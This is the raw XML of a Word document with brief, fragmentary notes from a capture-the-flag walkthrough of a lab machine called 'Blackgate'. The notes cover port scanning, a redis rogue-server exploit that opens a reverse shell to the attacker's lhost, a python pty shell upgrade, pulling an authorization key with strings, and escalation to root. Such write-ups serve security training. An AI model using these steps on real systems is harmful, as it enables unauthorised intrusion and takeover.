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89C553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B517AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blackgate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071958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B517A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17AA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B517A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517AA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B517A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517AA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B517A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517AA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53AF41E" w14:textId="305DBD96" w:rsidR="004C4112" w:rsidRDefault="004C4112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-reason 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-T4 -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-version-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="75DB32DB" w:rsidR="00843DCE" w:rsidRDefault="008B1F7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recon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68007232" w14:textId="1F9B7B98" w:rsidR="008B1F7D" w:rsidRDefault="007E593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0B3EBE6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ssh-audit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16DC273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searchsploit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redis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obtain notice buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9A533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searchsploit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paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D34CE6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already obtain the version is 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="6480EE92" w:rsidR="00843DCE" w:rsidRDefault="001B563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exploit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redis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server exploit with iw00tr00t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16F289D3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hacktirics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redit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="719E17BA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 link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redis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rogue server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59011DA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clone it and cd it  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA621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resi.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F0B89C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resi.py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rhost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lhost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1BE7066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just enter then fill other details as fore reverse shell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08EC5237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6D1ACA7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get the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D52F5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python3 -c ‘import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pty;pty.spawn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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884D706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/bin/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</w:p>
    <w:p w14:paraId="6B39B52D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home we obtain local.txt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C459BAD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571F3D2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but we cannot go as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA38D10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paste = its asked for authentication key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70678D7B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strings paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB8C76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is the authorization key copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338708D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are in nano so just do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274270FE" w14:textId="77777777" w:rsidR="001B563B" w:rsidRDefault="001B563B" w:rsidP="001B56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!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</w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="181A643A" w:rsidR="00843DCE" w:rsidRDefault="001B563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root</w:t>
      </w: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82EF1BE" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="001B56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in Desktop we obtain the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F43BF"/>
    <w:rsid w:val="00145141"/>
    <w:rsid w:val="00163013"/>
    <w:rsid w:val="0018646C"/>
    <w:rsid w:val="001B563B"/>
    <w:rsid w:val="001D0006"/>
    <w:rsid w:val="003670A2"/>
    <w:rsid w:val="003E3BF9"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004730C5"/>
    <w:rsid w:val="004C4112"/>
    <w:rsid w:val="005009CD"/>
    <w:rsid w:val="006E2725"/>
    <w:rsid w:val="00725D67"/>
    <w:rsid w:val="00780C6D"/>
    <w:rsid w:val="007B20D3"/>
    <w:rsid w:val="007E5937"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00882345"/>
    <w:rsid w:val="008B1F7D"/>
    <w:rsid w:val="008B6FBA"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B517AA"/>
    <w:rsid w:val="00B721AF"/>
    <w:rsid w:val="00C31B9F"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00DF40CD"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F91C71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23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-31T15:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>